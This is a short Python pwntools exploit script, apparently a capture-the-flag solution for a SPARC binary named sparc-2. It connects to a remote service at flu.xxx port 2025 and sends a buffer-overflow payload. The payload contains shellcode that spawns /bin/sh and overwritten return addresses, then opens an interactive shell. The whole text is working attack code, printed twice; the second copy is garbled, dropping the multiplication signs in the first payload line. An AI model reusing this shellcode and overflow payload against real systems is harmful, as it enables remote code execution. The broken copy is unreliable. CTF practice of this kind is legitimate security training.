farazsth98/secret_pwnhub_academy_rewards_club_2.py

## secret_pwnhub_academy_rewards_club_2.py
#!/usr/bin/env python3

from pwn import *

context.arch = "sparc"

elf = ELF("./sparc-2")
p = remote("flu.xxx", 2025)

shellcode = b"AA\x90\x90\xeb\x34\x21\x0b\xd8\x9a\xa0\x14\x21\x6e\x23\x0b\xcb\xdc\xa2\x14\x63\x68\xe0\x3b\xbf\xf0\xc0\x23\xbf\xf8\x90\x23\xa0\x10\xc0\x23\xbf\xec\xd0\x23\xbf\xe8\x92\x23\xa0\x18\x94\x22\x80\x0a\x82\x10\x20\x3b\x91\xd0\x20\x08\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"

payload = b"1"*7 + b"3"*5
payload += b"4"
payload += b"\xff"
payload += shellcode
payload += b"A"*102
payload += p32(0xffffea00)
payload += p32(0xffffea68-8)

p.sendline(payload)

p.interactive()
	#!/usr/bin/env python3

	from pwn import *

	context.arch = "sparc"

	elf = ELF("./sparc-2")
	p = remote("flu.xxx", 2025)

	shellcode = b"AA\x90\x90\xeb\x34\x21\x0b\xd8\x9a\xa0\x14\x21\x6e\x23\x0b\xcb\xdc\xa2\x14\x63\x68\xe0\x3b\xbf\xf0\xc0\x23\xbf\xf8\x90\x23\xa0\x10\xc0\x23\xbf\xec\xd0\x23\xbf\xe8\x92\x23\xa0\x18\x94\x22\x80\x0a\x82\x10\x20\x3b\x91\xd0\x20\x08\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"

	payload = b"1"7 + b"3"5
	payload += b"4"
	payload += b"\xff"
	payload += shellcode
	payload += b"A"*102
	payload += p32(0xffffea00)
	payload += p32(0xffffea68-8)

	p.sendline(payload)

	p.interactive()